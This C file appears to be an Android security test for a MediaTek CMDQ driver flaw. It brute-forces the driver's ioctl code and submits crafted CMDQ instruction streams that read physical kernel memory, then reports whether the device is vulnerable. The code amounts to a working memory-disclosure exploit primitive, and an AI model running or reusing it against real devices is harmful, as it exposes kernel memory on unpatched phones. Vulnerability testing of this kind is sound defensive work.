/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#include "../includes/common.h"

// Device nodes that main() tries to open, in order, until one succeeds.
// Both the table and the strings it points at are read-only.
static const char *const device_names[] = {"/dev/mtk_cmdq", "/proc/mtk_cmdq",
                                           "/dev/mtk_mdp"};

// Request code that main() passes to ioctl() together with a
// struct cmdqWriteAddressStruct before any reads are attempted.
// NOTE(review): under the generic Linux _IOC layout this decodes as a
// "write" request of type 'x', number 7, with an 8-byte argument - confirm
// against the driver headers.
#define CMDQ_IOCTL_ALLOC_WRITE_ADDRESS 0x40087807
// Request code that main() passes to ioctl() on exit, with the same argument
// structure, when the address field is non-zero.
#define CMDQ_IOCTL_FREE_WRITE_ADDRESS 0x40087808
// This is "most" of the IOCTL code, though the size field is left out as it
// will be ORed in later when the specific value for this device has been
// identified.
// work_out_ioctl_code() supplies the missing field by ORing (size << 16) into
// this value for every candidate size it probes.
#define CMDQ_IOCTL_EXEC_COMMAND 0x40007803

// Argument passed to the CMDQ_IOCTL_ALLOC_WRITE_ADDRESS and
// CMDQ_IOCTL_FREE_WRITE_ADDRESS ioctls.
struct cmdqWriteAddressStruct {
  // main() sets this to its read size before issuing the ALLOC ioctl.
  // NOTE(review): the unit the driver expects (bytes vs. 32-bit slots) is not
  // visible in this file - confirm against the driver.
  uint32_t count;
  // Initialised to 0 by main(); after the ALLOC ioctl its value is handed to
  // perform_pa_read() as the base address of the 32-bit staging slots, and a
  // non-zero value triggers the FREE ioctl on exit.  Presumably filled in by
  // the driver.
  uint32_t address;
};

// Type of cmdqCommandStruct::reg_request.  This file never sets its fields to
// anything other than zero (the enclosing command is memset to 0); it exists
// here to keep the command structure layout in step with the driver.
// NOTE(review): field meanings below are inferred from the names only.
struct cmdqReadRegStruct {
  // Presumably the number of entries referenced by `addresses`.
  uint32_t count;
  // Presumably a user-space pointer carried as a 64-bit integer.
  uint64_t addresses;
};

// Type of cmdqCommandStruct::reg_value.  This file never sets its fields to
// anything other than zero (the enclosing command is memset to 0); it exists
// here to keep the command structure layout in step with the driver.
// NOTE(review): field meanings below are inferred from the names only.
struct cmdqRegValueStruct {
  // Presumably the number of entries referenced by `values`.
  uint32_t count;
  // Presumably a user-space pointer carried as a 64-bit integer.
  uint64_t values;
};

// Type of cmdqCommandStruct::read_address; tells the driver which staging
// slots to read back once the command has run and where to put the values.
struct cmdqReadAddressStruct {
  // perform_pa_read() stores its `size` argument (a byte count) here.
  uint32_t count;
  // User-space pointer, carried as a 64-bit integer, to an array of 32-bit
  // slot addresses (one per word read by perform_pa_read()).
  uint64_t addresses;
  // User-space pointer, carried as a 64-bit integer, to the caller's output
  // buffer.
  uint64_t values;
};

// Argument passed to the EXEC_COMMAND ioctl.  Instances are always memset to
// zero before the fields used by this file are filled in.
struct cmdqCommandStruct {
  // value1..value3 are never written by this file and therefore stay zero.
  uint32_t value1;
  uint32_t value2;
  uint64_t value3;
  // User-space pointer, carried as a 64-bit integer, to the array of 64-bit
  // instruction words.
  uint64_t buffer;
  // Number of bytes of instructions in `buffer`; SET_VALUE advances it by 8
  // for every instruction appended.
  uint32_t buffer_size;
  // Left zeroed by this file.
  struct cmdqReadRegStruct reg_request;
  // Left zeroed by this file.
  struct cmdqRegValueStruct reg_value;
  // Filled in by perform_pa_read(); left zeroed by work_out_ioctl_code().
  struct cmdqReadAddressStruct read_address;
  // Pads the structure out to 0x2f0 bytes, the largest size probed by
  // work_out_ioctl_code().  The 0x58 term is the size of the members above on
  // ABIs where uint64_t is 8-byte aligned.
  uint8_t padding[0x2f0 - 0x58];
};

// Outcome of a driver operation attempted by this test.
typedef enum {
  // The operation completed: perform_pa_read() returns this when the ioctl
  // returned 0, work_out_ioctl_code() when it found a usable ioctl code.
  OperationSuccess,
  // perform_pa_read() returns this when the ioctl failed with EFAULT, i.e. the
  // driver rejected the command buffer; main() treats it as "not vulnerable".
  OperationFailed,
  // Anything else: bad arguments, allocation failure, an unexpected ioctl
  // result, or no ioctl code could be identified.
  OperationError,
} OperationResult;

// Appends one 64-bit instruction word to the command being built.
//
// Relies on two names being in scope at the point of use: `instructions`
// (indexable as 64-bit slots) and `command` (with a `buffer_size` member
// holding the number of instruction bytes written so far).  Each use stores
// `x` in the next free 8-byte slot and advances `command.buffer_size` by 8.
//
// The body is wrapped in do { } while (0) so that the macro expands to a
// single statement and stays correct inside unbraced if/else bodies.
#define SET_VALUE(x)                                                           \
  do {                                                                         \
    instructions[command.buffer_size / 8] = (x);                               \
    command.buffer_size += 8;                                                  \
  } while (0)

// Discovers the complete EXEC_COMMAND ioctl code for the opened device.  The
// size field of the code varies with the driver's command structure size, so
// every candidate size from 0xa8 to 0x2f0 (in steps of 8) is tried with a
// minimal command until the driver answers with anything other than ENOTTY.
//
// fd         - open descriptor for the device.
// ioctl_code - receives the complete request code; written only on success.
//
// Returns OperationSuccess as soon as a candidate is recognised, or
// OperationError if every candidate fails with ENOTTY.
OperationResult work_out_ioctl_code(int fd, int *ioctl_code) {
  static const uint64_t probe_program[] = {
      // CMDQ_CODE_WFE
      0x2000000080010000,
      // CMDQ_CODE_EOC
      0x4000000000000001,
      // CMDQ_CODE_JUMP - argA is 0 and argB is 8, this is ok.
      0x1000000000000008,
  };
  uint64_t instructions[0x100] = {0};
  struct cmdqCommandStruct command;
  int candidate_size = 0xa8;

  memset(&command, 0, sizeof(command));
  memcpy(instructions, probe_program, sizeof(probe_program));
  command.buffer = (uint64_t)&instructions;
  command.buffer_size = (uint32_t)sizeof(probe_program);

  while (candidate_size <= 0x2f0) {
    const int candidate = CMDQ_IOCTL_EXEC_COMMAND | (candidate_size << 16);

    // ENOTTY means the driver does not know this request code; any other
    // outcome (success or a different error) means the code was recognised.
    if (ioctl(fd, candidate, &command) != -1 || errno != ENOTTY) {
      *ioctl_code = candidate;
      return OperationSuccess;
    }
    candidate_size += 8;
  }

  // Unable to identify the particular IOCTL code for this device.
  return OperationError;
}

// Asks the driver to read `size` bytes of physical memory starting at
// `address` and return them in `buffer`.
//
// A command buffer is assembled with five instructions per 32-bit word to
// read, bracketed by a WFE prologue and a WFE/EOC/JUMP epilogue, and submitted
// through the EXEC_COMMAND ioctl.  Each word is staged in a 32-bit slot at
// `kernel_buffer + 4 * index`; the list of slot addresses and `buffer` are
// handed to the driver in `command.read_address`.
//
// fd            - open descriptor for the device.
// ioctl_code    - complete EXEC_COMMAND request code.
// kernel_buffer - base address of the staging slots (main() passes the address
//                 obtained through CMDQ_IOCTL_ALLOC_WRITE_ADDRESS).
// address       - first physical address to read.
// buffer        - destination handed to the driver for the values read.
// size          - number of bytes to read; must be a multiple of 4.
//
// Returns OperationSuccess if the ioctl returned 0, OperationFailed if it
// failed with EFAULT, and OperationError in every other case (size not a
// multiple of 4, size too large for the command buffer, allocation failure,
// or any other ioctl result).
OperationResult perform_pa_read(int fd, int ioctl_code, uint32_t kernel_buffer,
                                uint64_t address, unsigned char *buffer,
                                size_t size) {
  OperationResult result = OperationError;
  uint64_t *instructions = NULL;
  uint32_t *addresses = NULL;
  struct cmdqCommandStruct command;
  const size_t num_words = size / sizeof(uint32_t);

  if (size % sizeof(uint32_t)) {
    goto exit;
  }

  // command.buffer_size is only 32 bits wide, so refuse any request whose
  // instruction stream of (num_words * 5 + 4) * 8 bytes would not fit.  This
  // also guarantees that none of the size computations below can wrap.
  if (num_words > (UINT32_MAX / sizeof(uint64_t) - 4) / 5) {
    goto exit;
  }

  // Each command is 8 bytes, we require 5 commands for every 32 bits we try to
  // read, plus another 4 for prologue/epilogue.
  instructions = malloc((num_words * 5 + 4) * sizeof(*instructions));
  if (!instructions) {
    goto exit;
  }
  // Another buffer to tell the driver where to read back from.
  addresses = malloc(num_words * sizeof(*addresses));
  if (!addresses) {
    goto exit;
  }

  memset(&command, 0, sizeof(command));
  // Go through uintptr_t so the pointer value is widened to 64 bits without
  // relying on implementation-defined pointer-to-wider-integer conversion.
  command.buffer = (uint64_t)(uintptr_t)instructions;
  // NOTE(review): this is the byte count, not num_words - confirm which unit
  // the driver expects before changing it.
  command.read_address.count = (uint32_t)size;
  command.read_address.addresses = (uint64_t)(uintptr_t)addresses;
  command.read_address.values = (uint64_t)(uintptr_t)buffer;

  // CMDQ_CODE_WFE
  SET_VALUE(0x2000000080010000);

  for (size_t ii = 0; ii < num_words; ii++) {
    addresses[ii] = kernel_buffer + (sizeof(uint32_t) * ii);

    // CMDQ_CODE_MOVE - put DMA address into register
    SET_VALUE(0x0297000000000000 | addresses[ii]);
    // CMDQ_CODE_WRITE - write PA into DMA address
    SET_VALUE(0x0497000000000000 | (address + sizeof(uint32_t) * ii));
    // CMDQ_CODE_READ - read PA into register from DMA address
    SET_VALUE(0x01d7000000000005);
    // CMDQ_CODE_READ - read from PA into register
    SET_VALUE(0x01c5000000000005);
    // CMDQ_CODE_WRITE - write value into DMA address
    SET_VALUE(0x04d7000000000005);
  }

  // CMDQ_CODE_WFE
  SET_VALUE(0x2000000080010000);
  // CMDQ_CODE_EOC
  SET_VALUE(0x4000000000000001);
  // CMDQ_CODE_JUMP - argA is 0 and argB is 8, this is ok.
  SET_VALUE(0x1000000000000008);

  switch (ioctl(fd, ioctl_code, &command)) {
  case -1:
    if (errno == EFAULT) {
      // Command buffer rejected, the driver is patched.
      result = OperationFailed;
    }
    // Something is wrong with the command buffer.  This may be a device
    // type that has not been encountered during testing.
    break;
  case 0:
    // Driver accepted the command buffer and did something with it.
    result = OperationSuccess;
    break;
  default:
    // Unexpected return value; leave the result as OperationError.
    break;
  }

exit:
  // free(NULL) is a no-op, so no guards are needed here.
  free(addresses);
  free(instructions);
  return result;
}

int main() {
  int exit_code = EXIT_FAILURE;
  int fd = -1;
  unsigned char buffer[0x1000];
  size_t read_size = 0x100;
  struct cmdqWriteAddressStruct kernel_buffer = {read_size, 0};
  int ioctl_code = 0;
  bool command_accepted = false;
  // Mediatek have given these as possible kernel base addresses for different
  // devices.
  unsigned long kernel_bases[] = {0x40008000, 0x40080000, 0x80008000};
  unsigned long pa_length = 0x10000;

  for (size_t ii = 0; ii < sizeof(device_names) / sizeof(device_names[0]);
       ii++) {
    fd = open(device_names[ii], O_RDONLY);
    if (-1 == fd) {
      // If we can't access the driver, then it's not vulnerable.
      if (errno == EACCES) {
        exit_code = EXIT_SUCCESS;
        goto exit;
      }
    } else {
      break;
    }
  }
  if (-1 == fd) {
    goto exit;
  }

  if (-1 == ioctl(fd, CMDQ_IOCTL_ALLOC_WRITE_ADDRESS, &kernel_buffer)) {
    goto exit;
  }

  if (OperationSuccess != work_out_ioctl_code(fd, &ioctl_code)) {
    goto exit;
  }

  for (size_t ii = 0; ii < sizeof(kernel_bases) / sizeof(kernel_bases[0]);
       ii++) {
    for (unsigned long pa = kernel_bases[ii]; pa < kernel_bases[ii] + pa_length;
         pa += 0x1000) {
      memset(buffer, 0, read_size);

      switch (perform_pa_read(fd, ioctl_code, kernel_buffer.address, pa, buffer,
                              read_size)) {
      case OperationSuccess:
        command_accepted = true;
        for (size_t ii = 0; ii < read_size; ii++) {
          if (buffer[ii] != 0) {
            exit_code = EXIT_VULNERABLE;
            goto exit;
          }
        }
        break;
      case OperationFailed:
        exit_code = EXIT_SUCCESS;
        break;
      case OperationError:
        break;
      }
    }
  }

  // If the driver accepted commands, but we didn't manage to read any data,
  // then we failed to demonstrate a vulnerability.
  if (command_accepted) {
    exit_code = EXIT_SUCCESS;
  }

exit:
  if (-1 != fd) {
    if (kernel_buffer.address != 0) {
      (void)ioctl(fd, CMDQ_IOCTL_FREE_WRITE_ADDRESS, &kernel_buffer);
    }
    (void)close(fd);
  }

  return exit_code;
}
